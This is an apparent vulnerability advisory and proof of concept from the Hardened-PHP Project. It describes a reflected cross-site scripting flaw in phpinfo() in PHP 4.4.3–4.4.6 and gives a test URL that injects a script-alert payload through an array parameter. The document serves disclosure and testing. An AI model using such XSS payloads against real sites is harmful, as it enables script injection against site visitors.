PHP 4.4.3 - 4.4.6 phpinfo() Remote XSS Vulnerability

2007-03-04 00:00:00

////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \| || || _ \ //
// | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP 4 - phpinfo() XSS Testcase //
////////////////////////////////////////////////////////////////////////

To manually test for this vulnerability just call the phpinfo() page with a parameter like this.

http://localhost/phpinfo.php?a[]=<script>alert(/XSS/);</script>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.